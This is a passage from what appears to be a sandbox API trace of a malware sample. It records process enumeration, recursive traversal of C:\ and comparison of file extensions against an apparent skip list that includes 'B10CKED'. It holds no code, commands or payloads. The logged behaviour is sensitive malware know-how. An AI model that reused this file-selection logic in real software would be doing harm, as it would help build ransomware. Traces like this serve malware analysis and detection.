th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.309] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0107.309] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.310] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.312] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0107.313] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.314] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.315] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0107.316] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0107.317] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0107.318] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.319] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.321] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0107.322] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0107.323] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0107.324] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0107.325] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0107.327] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0107.328] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0107.329] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0107.330] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0107.331] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0107.332] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0107.333] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0107.334] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0107.336] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0107.337] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0107.440] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0107.441] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0107.443] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0107.444] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0107.445] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0107.446] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.447] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0107.448] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0107.449] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0107.450] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0107.451] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0107.452] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0107.453] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0107.454] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0107.455] CloseHandle (hObject=0xf4) returned 1 [0107.455] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0107.455] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 0x1c95c8 [0107.455] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*.*", lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0x1c9608 [0107.456] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0107.456] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\*.*", lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0x1c9648 [0107.457] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.457] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.457] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0 [0107.457] FindClose (in: hFindFile=0x1c9648 | out: hFindFile=0x1c9648) returned 1 [0107.457] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0 [0107.457] FindClose (in: hFindFile=0x1c9608 | out: hFindFile=0x1c9608) returned 1 [0107.458] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.458] CharUpperBuffW (in: lpsz="bat", cchLength=0x3 | out: lpsz="BAT") returned 0x3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="BAT", cchCount2=3) returned 1 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="BAT", cchCount2=3) returned 1 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="BAT", cchCount2=3) returned 1 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="BAT", cchCount2=3) returned 1 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="BAT", cchCount2=3) returned 3 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="BAT", cchCount2=3) returned 2 [0107.459] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] FindNextFileW (in: hFindFile=0x1c95c8, 